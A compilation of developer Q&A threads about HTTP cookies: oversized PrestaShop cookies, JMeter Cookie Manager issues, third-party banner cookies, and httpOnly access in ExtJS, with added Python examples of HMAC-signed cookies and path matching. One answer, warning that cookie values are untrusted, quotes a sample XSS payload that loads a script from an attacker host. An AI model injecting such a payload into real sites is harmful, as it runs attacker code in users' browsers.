PrestaShop cookies exceed 4 KB - cookies

I have a problem with a PrestaShop project.
PrestaShop creates a cookie that exceeds the maximum authorized size (4 KB).
I have no idea which module or controller or something else creates that cookie.
Can you help me make these cookies smaller or find which controller created them?
Cookie: cp-popup-last-displayed=1662364477; axeptio_cookies={%22$$token%22:%22borew4apbudam6j1zuean%22%2C%22$$date%22:%222022-05-05T07:44:01.399Z%22%2C%22$$completed%22:true%2C%22google_analytics%22:true%2C%22Google_Ads%22:true%2C%22GoogleRemarketing%22:true%2C%22facebook_pixel%22:true%2C%22SendinBlue%22:true}; axeptio_authorized_vendors=%2Cgoogle_analytics%2CGoogle_Ads%2CGoogleRemarketing%2Cfacebook_pixel%2CSendinBlue%2C; axeptio_all_vendors=%2Cgoogle_analytics%2CGoogle_Ads%2CGoogleRemarketing%2Cfacebook_pixel%2CSendinBlue%2C; PrestaShop-d354edfaf436c62a4b18afdcf0ba8174=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; PHPSESSID=8oeegu4ns8ok86aef2jachr6ml; cp-popup-61=1662364312; cp-popup-63=1662364477; PrestaShop-1875e1269d17c82b34ad3c945ac1416b=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

The PrestaShop cookie is encrypted when it is sent to the client
(your PrestaShop-d354edfaf436c62a4b18afdcf0ba8174=def50200037b619c0f4... is the whole encrypted cookie content).
You'll have to debug this "server side" by checking the Cookie.php class and dumping the $cookie object in the _setcookie() method before it gets encrypted.

It is probably because of the Last viewed module. This product stores too many modules inside the Cookie. Do you use this module?

Related

JMeter 5.4.1 Cookie Manager - User-Defined Cookie not added to request's cookies

Firstly, I did add the line CookieManager.check.cookies=false to jmeter.properties.
What I'm Trying to Do
I want to add a cookie to a request's existing cookies.
For example, I see the request has [edited]:
Cookie Data:
c1=sfasfsfsfsfs; c2=erqwerqwrr; c3=poiuopiupoi
Expected Results
I would like it to have:
Cookie Data:
c1=sfasfsfsfsfs; c2=erqwerqwrr; c3=poiuopiupoi; partner=favicon.ico
Here is what I tried:
BASE_URL_2 is a variable defined in the form qa.company.com.
Actual Results
Whatever I have tried so far has not made any change in the cookies.
What else shall I try?
Underlying Motivation
Recorded a Web session and played it back.
Added a RegEx Extractor to pull out a token and then added it to subsequent requests. That helped.
However, certain requests failed with a custom application exception: Security violation, please refresh.
Probably session login state is not being passed, so the website thinks the call is "stale".
I've seen this on the GUI when the session expires and you try to click a button on the site.
On comparing the cookies seen in JMeter with what I saw in the Chrome Debugger, it was clear that there were more cookies in the running application than what I had in JMeter.
Are you sure you're using the HTTPS protocol? If you have the secure flag set and are using the HTTP protocol, the cookie will not be sent.
Also remove = from partner=, otherwise you will end up with partner==favicon.ico
Demo:
More information:
Using HTTP cookies
HTTP Cookie Manager Advanced Usage - A Guide

Storing the value of cookie in variable but doesn't appear in cookie data in request body in Jmeter

There are lots of cookies present and I need to extract those cookies and pass them as a POST parameter in a further request. So I have changed the settings for them in the jmeter.properties file as
save.cookies=true
check.cookies=false
Then after running the test, I got those cookie values in the Debug Sampler as ${COOKIE_}
EXPECTED:
GET data:
Cookie Data:
private_content_version=e17f5f6a5ed9557378a6f85fa2202c0e;form_key=mCPI56sUAl6bqAJdqq;
Actual Result
GET data:
[no cookies]
I have passed in the value in the HTTP Header Manager as
name=private_content_version
Value=${COOKIE_private_content_version}
name=form_key
Value=${COOKIE_Form_key}
But instead of the value, the variable itself is passed as ${COOKIE_private_content_version}
Also there are multiple cookies and I need to fetch them too and pass them in a further HTTP request payload, but I am unable to do that. What am I missing? Please help.
Do I need to add the Cookie Manager under each of the HTTP requests, or define it globally?
Also, how do I define them?
You don't need to manually add cookies in the HTTP Header Manager, the Cookie Manager should normally handle them.
If for some reason you need to build the Cookie header manually, make sure to use the strict Cookie name and, in the value, one or more name/value pairs of cookies separated by semicolons.
You might find the HTTP Cookie Manager Advanced Usage - A Guide article useful; it contains comprehensive information on HTTP Cookie Manager configuration and troubleshooting.

Can I set a cookie in this situation?

I want to post a banner ad on a.com. For this to happen, a.com has to query b.com for the banner URL via JSONP. When requested, b.com returns something like this:
{
img_url: www.c.com/banner.jpg
}
My question is: is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
To clarify:
c.com isn't trying to track any information on a.com. It just wants to set a third-party cookie on the client browser for tracking purposes.
I have no control of a.com, so I cannot write any client-side JS or ask them to include any external JS files. I can only expose a query URL on b.com for a.com's programmer to query.
I have total control of b.com and c.com.
When a.com receives the banner URL via JSONP, it will insert the banner dynamically into its DOM for display purposes.
A small follow-up question:
Since I don't know how a.com's programmer will insert the banner into the DOM, is it possible for them to request the image from c.com but still prevent c.com from setting any third-party cookies?
is it possible for c.com to set a cookie on the client browser so that it knows if the client has seen this banner image already?
Not based on the requests so far. c.com isn't involved beyond being mentioned by b.com.
If the data in the response from b.com was used to make a request to www.c.com then www.c.com could include cookie setting headers in its request.
Subsequent requests to www.c.com from the same browser would echo those cookies back.
These would be third party cookies, so are more likely to be blocked by privacy settings.
Simple Version
In the HTTP response from c.com, you can send a Set-Cookie header.
If the browser does end up loading www.c.com/banner1234.jpg and later www.c.com/banner7975.jpg, you can send e.g. Set-Cookie: seen_banners=1234,7975 to keep track of which banners have been seen.
When the HTTP request arrives at www.c.com, it will contain a header like Cookie: seen_banners=1234,7975 and you can parse out which banners have been seen.
If you use separate cookies like this:
Set-Cookie: seen_1234=true
Set-Cookie: seen_7975=true
Then you'll get back request headers like:
Cookie: seen_1234=true; seen_7975=true
The choice is up to you in terms of how much parsing you want to do of the values. Also note that there are many cookie attributes you may consider setting.
Caveats
Some modern browsers and ad-blocking extensions will block these cookies as an anti-tracking measure. They can't know your intentions.
These cookies will be visible to www.c.com only.
Cookies have size restrictions imposed by browsers and even some firewalls. These can be restrictions in per-cookie length, length of sum of cookies per domain, or just number of cookies. I've encountered a firewall that allowed a certain number of bytes in Cookie: request headers and dropped all Cookie: headers beyond that size. Some older mobile devices have very small limits on cookie size.
Cookies are editable by the user and can be tampered with by men-in-the-middle.
Consider adding an authenticator over your cookie value such as an HMAC, so that you can be sure the values you read are values you wrote. This won't defend against replay attacks unless you include a replay defense such as a timestamp before signing the cookie.
This is really important: Cookies you receive at your server in HTTP requests must be considered adversary-controlled data. Unless you've put in protections like that HMAC (and you keep your HMAC secret really secret!) don't put those values in trusted storage without labeling them tainted. If you make a dashboard for tracking banner impressions and you take the text of the cookie values from requests and display them in a browser, you might be in trouble if someone sends:
Cookie: seen_banners=<script src="http://evil.domain.com/attack_banner_author.js"></script>
Aside: I've answered your question, but I feel obligated to warn you that jsonp is really, really dangerous to the users of site www.a.com. Please consider alternatives, such as just serving back HTML with an img tag.
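A minimal sketch of the HMAC-plus-timestamp protection and the tainted-data handling described in the caveats above. This is an added example, not code from the answer; the secret, the ids.timestamp.mac layout, the "-" separator, the one-hour window and the function names are assumptions.

```python
import hashlib
import hmac
import html
import time

# Assumptions for this example: key material and acceptance window.
SECRET = b"constructed-demo-key-load-the-real-one-from-a-secret-store"
MAX_AGE = 3600  # seconds a signed value stays acceptable


def _mac(payload, secret):
    return hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()


def sign_seen_banners(banner_ids, now=None, secret=SECRET):
    """Build the seen_banners cookie value as ids.timestamp.mac."""
    ts = int(time.time() if now is None else now)
    # int() rejects anything that is not a number; "-" avoids the comma,
    # which RFC 6265 does not allow in a cookie value.
    ids = "-".join(str(int(b)) for b in banner_ids)
    payload = f"{ids}.{ts}"
    return f"{payload}.{_mac(payload, secret)}"


def read_seen_banners(cookie_value, now=None, secret=SECRET, max_age=MAX_AGE):
    """Return the banner ids, or None when the value is forged or stale."""
    now = time.time() if now is None else now
    parts = cookie_value.rsplit(".", 2)
    if len(parts) != 3:
        return None
    ids, ts, mac = parts
    expected = _mac(f"{ids}.{ts}", secret)
    # Constant-time comparison; only authenticated fields are parsed below.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    if now - int(ts) > max_age:  # replay defense: reject old signatures
        return None
    return [int(b) for b in ids.split("-") if b]


def for_dashboard(raw_cookie_value):
    """Unverified cookie text is tainted: escape it before it reaches HTML."""
    return html.escape(raw_cookie_value, quote=True)


if __name__ == "__main__":
    value = sign_seen_banners([1234, 7975])
    print("Set-Cookie: seen_banners=" + value)
    print(read_seen_banners(value), read_seen_banners(value + "0"))
```

The timestamp only bounds how long a captured value can be replayed; within that window the same signed value is still accepted.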

Cookie Manager of Apache JMeter doesn't add the cookie to POST request

I built a very simple test plan.
Login: POST, a session cookie is returned.
Get the state: GET, a user state is returned.
Create a resource: POST, JSON body is supplied for the resource.
So my 'Test Plan' looks like:
Test Plan
Thread Group
HTTP Request Defaults
HTTP Cookie Manager
Login (HTTP Request Sampler: POST)
Get State (HTTP Request Sampler: GET)
Create Resource (HTTP Request Sampler: POST)
The cookie generated by 'Login' is added to 'Get State' correctly.
But 'Create Resource' has NO cookie. I changed their order but it doesn't help.
I used the default options at first and then changed some options, but that doesn't help either.
Is it a bug in JMeter, or is a POST HTTP request just not able to have a cookie?
Please give me any advice.
[SOLVED]
I noticed that it is related to the path, not the method.
You'd like to look at the domain of the cookie as well as the path.
I mean, the path and the domain of a cookie could be defined on the server side through the Set-Cookie header.
Another solution is to set CookieManager.check.cookies=false in jmeter.properties, usually sitting beside the jmeter startup script in bin.
JMeter for some reason thinks that you can't set the path=/something in a cookie if you are on http://somesite/somethingelse. That is, the path has to match the path you're currently on.
I've never seen a browser enforce this limitation if it actually exists. I've seen and written several sites that use this technique to set a secure cookie and then forward someone say to /admin.
I wish this option was at least in the GUI so I didn't have to change the properties file. I think BlazeMeter is smart enough to turn off checking where flood.io is not. If it were up to me I'd just remove the code that checks this entirely. Why make the load tester any harder than it needs to be?
I had this turned on in my Spring Boot server, which was causing the issue with CookieManager in JMeter:
server.servlet.session.cookie.secure=true
Removing this made the cookies flow! Of course this is for localhost. For production you may need this turned on.
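The path, domain and Secure-flag effects described in the answers above can be reproduced with the RFC 6265 matching rules. This is an added example, not JMeter or Spring Boot code; the cookie, host names and paths are constructed.

```python
from urllib.parse import urlsplit

# Constructed sample: a session cookie scoped by the server's Set-Cookie header.
SESSION = {"name": "SESSION", "domain": "localhost", "path": "/api/user", "secure": False}


def path_matches(request_path, cookie_path):
    """RFC 6265 section 5.1.4 path-match."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        # "/api/user" covers "/api/user/state" but not "/api/username".
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


def domain_matches(host, cookie_domain):
    """RFC 6265 section 5.1.3 domain-match, host names only (no IP literals)."""
    host = host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")
    return host == cookie_domain or host.endswith("." + cookie_domain)


def why_not_sent(cookie, url):
    """Return None when the cookie accompanies the request, else the reason."""
    target = urlsplit(url)
    if not domain_matches(target.hostname or "", cookie["domain"]):
        return "domain mismatch"
    if not path_matches(target.path or "/", cookie["path"]):
        return "path mismatch"
    if cookie["secure"] and target.scheme != "https":
        return "Secure cookie over plain HTTP"
    return None


def explain(cookie, urls):
    """Map each URL to 'sent' or the reason the cookie is withheld."""
    return {url: why_not_sent(cookie, url) or "sent" for url in urls}


if __name__ == "__main__":
    plan = ["http://localhost:8080/api/user/state",   # "Get State"
            "http://localhost:8080/api/resources"]    # "Create Resource"
    for url, verdict in explain(SESSION, plan).items():
        print(f"{verdict:32} {url}")
    for url, verdict in explain(dict(SESSION, secure=True), plan[:1]).items():
        print(f"{verdict:32} {url}")
```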

ExtJS 4.0 cannot read connect.sid from cookie

I am trying to develop a web application with ExtJS 4.0.
On startup the application sends a request to a server. This server sends a response. The response's header contains Set-Cookie:"connect.sid=foobar"
When I look into the preferences of my browser, I can see that the cookie was created correctly.
My problem is that somehow I cannot access this cookie in my ExtJs application and I don't know why.
I tried to retrieve it with the following methods:
document.cookie.split(";")[0]
Ext.state.Manager.get("connect.sid"); => of course I initialized the state manager with a cookie provider
Ext.util.Cookies.get("connect.sid");
No matter which method I use, I always get undefined as the return value.
I hope somebody can help me, because I really don't understand why it does not work.
Thanks in advance.
Finally I found the problem.
The httpOnly flag was set in the response header. Therefore the cookie was not accessible to JavaScript.